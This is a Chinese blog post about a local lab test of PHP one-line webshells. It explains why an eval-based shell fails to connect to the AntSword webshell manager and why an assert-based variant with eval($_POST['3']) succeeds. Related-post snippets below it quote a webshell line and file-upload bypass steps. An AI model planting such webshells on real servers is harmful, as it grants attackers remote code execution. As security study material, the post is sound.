复现assert和eval成功连接或失败连接蚁剑的原因

已于 2022-07-29 16:34:16 修改
阅读量5.6k 收藏 19
点赞数 6
分类专栏: 安全 文章标签: php 开发语言
于 2022-07-23 15:27:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49137360/article/details/125947065
版权

准备工作

    1.首先编写一个php文件,写入一句话木马,然后通过Phptudy启动这个网站

    2.下载蚁剑工具和burpsuite工具

Burpsuite2021.10安装详细教程_青果@的博客-CSDN博客_burpsuite安装百度网盘链接:链接:https://pan.baidu.com/s/1AKS54jtyN6Ohkt1VDZ0Jiw提取码:v73p下载之后解压,解压之后会有两个文件点击jdk-18_windows-x64_bin.exe进行安装然后对应的安装目录查看是否有jdk的文件打开该文件夹,看是否有jre文件夹,我这里就没有没有jre文件参考大佬的方案:https://blog.csdn.net/qq_41219157/article/details/109667631可以看到jre文件https://blog.csdn.net/weixin_45632448/article/details/125071440GitHub - AntSwordProject/antSword: 中国蚁剑是一款跨平台的开源网站管理工具。AntSword is a cross-platform website management toolkit.中国蚁剑是一款跨平台的开源网站管理工具。AntSword is a cross-platform website management toolkit. - GitHub - AntSwordProject/antSword: 中国蚁剑是一款跨平台的开源网站管理工具。AntSword is a cross-platform website management toolkit.https://github.com/AntSwordProject/antSword

通过eval进行测试连接

  • eval是PHP自身的语言结构,不能被可变函数调用
  • PHP 支持可变函数的概念。意味着如果一个变量名后有圆括号,PHP 将寻找与变量的值同名的函数,并且尝试执行它
  • eval除非通过自己再去构造一个函数来进行木马传递

1.首先将1中传值为eval,密码为2,尝试构成eval()函数

此时返回数据为空,连接失败,原因是因为eval()是一个语言构造器,他不能使用PHP提供的可变函数来调用

利用assert进行连接

  • 与eval不同,因为assert在php中被认为是一个函数
  • eval函数中参数是字符,assert函数中参数为表达式 (或者为函数)
  • 下面将通过assert()来实现一句话木马,原理和前面类似。

直接使用1=assert&2来作为密码

使用burp suite工具抓包,发现2的值是直接输入的一系列PHP获取文件的函数的字符串

assert()函数的参数不能使字符串,必须是函数才能够执行语句

改变编码方式

抓包,发现此时因为编码方式是base64,所以2处自动调用了eval(base64_decode())进行对PHP的文件相关函数的解码,满足了assert()函数参数必须是函数的条件

尝试使用1=assert 2=eval($_POST[‘3’])的方式传值

此时可变函数为assert(eval($_POST[‘3’]))也满足了assert()参数必须是函数,且eval语句中有可以传递的参数值,所以连接成功

miracle-boy
关注
  • 6
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用Nodejs连接mongodb数据库的实现代码
01-02
一个简单的nodejs连接mongodb示例,来自 mongodb官方示例 1. 创建package.json 首先,创建我们的工程目录connect-mongodb,并作为我们的当前目录 mkdir connect-mongodb cd connect-mongodb 输入npm init命令创建...
连接php3,xss漏洞,获取者shell
weixin_39654465的博客
03-10 1065
今日在github上看到暴露了一个xss漏洞,自己也经常使用。同时在freebuf上也有一篇文章,关于漏洞的。闲着没事测试了一波。一、漏洞成因shell远程连接失败时,会返回错误信息,但因为使用的是html解析,导致xss漏洞。用过的童靴都清楚,当我们远程连接写好的webshell的时候,有时候可能因为shell书写错误或者链接填写不当的时候,会出现大堆的错误代码。该信息并...
菜刀或连接sqlserver2008失败 500错误 解决方法
baynk的博客
05-27 3200
0x01 解决菜刀或者连接问题 最近在测试一个环境,发现使用菜刀或者连接sqlserver2008时连接不上,记录一下解决方法。 原来通过菜刀连接sql server直接使用下列语句 <T>ADO</T> <C>Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=xxx</C> 填入正确的用户名密码信息后就可以连接,但是这次就出现在了错误 [Microsoft][ODBC SQ
PolarCTF2023冬季个人挑战赛wp含web、misc、crypto_polar冬季赛
最新发布
m0_60452070的博客
04-18 750
php.ini中的一个配置选项,它可将用户访问文件的活动范围限制在指定的区域,假设open_basedir=/home/wwwroot/home/web1/:/tmp/,那么通过web1访问服务器的用户就无法获取服务器上除了/home/wwwroot/home/web1/和/tmp/这两个目录以外的文件。(补题发现,秋季那道ezupload,上传GIF文件,再抓包改php后缀,,不过我连接的时候,警告返回数据为空?上传文件之后,可以F12查看网络,就可以看到文件上传的位置了,再用连接即可。
返回数据为空的几种原因
m0_73581247的博客
03-13 1万+
今天连接死活连不上到头来发现post没有大写。1,可能是post没有大小写,中国返回数据为空,2,看防火墙有没有关,3,代理是不是手动。
关于安装出现的问题不成功连不上webshell的问题
weixin_67426184的博客
04-20 3713
文件上传
文件上传漏洞—连接地址错误、一句话木马php语法错误
热门推荐
Xionghuimin的博客
06-02 3万+
题目 第一步:把写有<?php phpinfo(); ?>代码的txt文件改文件名为infor.jpg,上传过程中用burpsuite抓包修改为infor.php。提示上传成功后在url中可以打开 第二步:把写有 <? php phpinfo(); @eval($_POST['shell']); ?> 代码的txt文件改文件名为infors.jpg,上传过程中用burpsuite抓包修改为infors.php。提示上传成功后在url中打开但是什么也没有显示,连接不上。
操作手册
weixin_44820552的博客
03-27 2837
(AntSword)是一款开源的跨平台WebShell管理工具,将一句话木马上传到被测平台,通过进行连接获取被测平台的服务器webshell。
中国中可能出现的问题
2201_75437983的博客
08-10 4213
(1)如果在最开始添加数据错误可能是在添加地址时的URL地址有两个http://它最开始就自带http://你可能没注意直接复制了网址就导致有两个http://。(3)这个连接失败情况可能是php代码出错,也可能是要关闭你的防火墙,关闭之后能ping通就是连接成功。(2)如果出现这种情况就是你的一句话木马php代码出错了。都没有成功最后是使用了这个。我跟着其他大佬使用过。这样能够连接成功了。
java实现连接mysql数据库单元测试查询数据的实例代码
09-01
在Java编程中,连接MySQL数据库并进行单元测试查询数据是一项常见的任务,它涉及到Java的JDBC(Java Database Connectivity)API。下面我们将详细探讨如何实现这一功能,并通过一个实例代码来说明。 首先,我们需要...
c++实现strcat字符串连接库函数的方法详解
09-05
你提到了一个自定义实现`mystrcat`的版本,这个实现通过`assert`来检查`destStr`和`srcStr`不为`NULL`,然后使用两个`while`循环来完成字符串连接。这里有一个潜在的问题:如果`destStr`和`srcStr`指向相同的字符串...
Redis教程(十五):C语言连接操作代码实例
12-16
在本篇“Redis教程(十五):C语言连接操作代码实例”中,我们将学习如何使用C语言连接到Redis服务器并执行基本的操作。首先,要强调的是,由于Redis官方并未提供适用于Windows平台的C语言客户端库,所以这里的示例...
windows下安装mongodb以及node.js连接mongodb实例
01-19
一、MongoDB 下载 ... 二、安装完毕后创建数据目录。 MongoDB将数据目录存储在 db 目录下。但是这个数据目录不会主动创建,我们在安装完成后需要创建它。请注意,数据目录应该放在根目录下((如: C:\ 或者 D:\ 等 )。...
完全解决{“code“:“ECONNRESET“,“errno“:“ECONNRESET“,“syscall“:“read“}和哥斯拉连接fail的问题
weixin_62843906的博客
01-02 1873
如果没有开系统代理 ,那就是wifi的问题,看看自己是否连接了公司的无线网或者是校园网,因为一般像这种企业级的wifi都会在顶部做一些防护手段来保证安全性,就比如说放置一些安全设备,这也是大家经常发现照着教程一步一步来的但是最后却总是失败的具体原因。但是连接不上,总是出现{"code":"ECONNRESET","errno":"ECONNRESET","syscall":"read"}这种报错,甚至离谱的是有时候明明已经连接上了但还是会出现这种错误。网上给出的解决办法大概率大多数都是不管用的。
CTF 总结01:文件上传绕过
weixin_42789937的博客
12-11 5812
文件上传的番外,一句话木马绕过思路,第二版整理,还是会根据做题经验增补的~
连接一句话木马
m0_64417923的博客
05-18 8213
一,在服务器上安装phpstudy 二,安装成功后启动apache 三,打开网站,看看是否成功 四,在攻击端安装菜刀 安装好后尝试用浏览器进入服务器搭建的网站(必须先设置好桥接) 输入服务器ip即可 cmd输入:ipconfig 正常情况下需要通过网站的漏洞,将一句话木马上传到网站上, 五,将一句话木马复制到网站 不过这次只是测试学习如何使用一句话木马的,所以直接将一句话木马复制到网站中: 创建一个文本,写入 <?php eval($_REQUEST[123..
DVWA-文件上传与文件包含
qq_60848021的博客
06-23 3022
1,代码分析: 从以上代码可以看出并没有做任何限制,先用最简单的PHP一句话代码试下: 使用中国进行连接 扩展:使用中国连接出现以下情况是路径地址错误 出现”返回数据为空“,是代码有错误;basename()函数:返回带有文件扩展名的文件名部分。例如:/xx/test.php,返回test.php代码分析:继续上传yjh.php,使用BP进行抓包,更改文件类型扩展:[$_FILES’userfile’][‘name’]客户端机器文件的原名称。[$_FILES’userfile’][‘type
使用出现 Error {“address“:“47.98.50.28“,“code“:“EACCES“,“errno“:“EACCES“,“port“:80,“syscall“:“connect“
weixin_43886198的博客
08-16 2063
使用出现{“address”:“127.0.0.1”,“code”:“ECONNREFUSED”,“errno”:“ECONNREFUSED”,“port”:8080,“syscall”:“connect”}
QT如何判断信号槽连接是否成功
06-10
在 QT 中,可以通过以下两种方式来判断信号槽连接是否成功: 1. 使用返回值:在 QT 中,QObject 类的 connect() 函数会返回一个 bool 类型的值,表示信号槽连接是否成功。如果连接成功,返回 true;如果连接失败,返回 false。因此,可以通过判断 connect() 函数的返回值来判断信号槽连接是否成功。例如: ```c++ bool isConnected = QObject::connect(sender, SIGNAL(mySignal()), receiver, SLOT(mySlot())); if (isConnected) { qDebug() << "Signal-slot connection succeeded!"; } else { qDebug() << "Signal-slot connection failed!"; } ``` 2. 使用断言:在 QT 中,如果信号槽连接失败,会在运行时输出一个错误信息。我们可以利用这个错误信息来判断信号槽连接是否成功。例如: ```c++ QObject::connect(sender, SIGNAL(mySignal()), receiver, SLOT(mySlot())); Q_ASSERT_X(sender->isSignalConnected(receiver, SIGNAL(mySignal())), "MyClass::myFunction", "Signal-slot connection failed!"); ``` 这里的 Q_ASSERT_X() 函数会判断 sender 是否与 receiver 成功连接了 mySignal() 信号和 mySlot() 槽函数,如果连接失败,就会输出一个错误信息。如果连接成功,就不会有任何输出。 以上是两种判断 QT 信号槽连接是否成功的方法,希望能够帮助到你。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值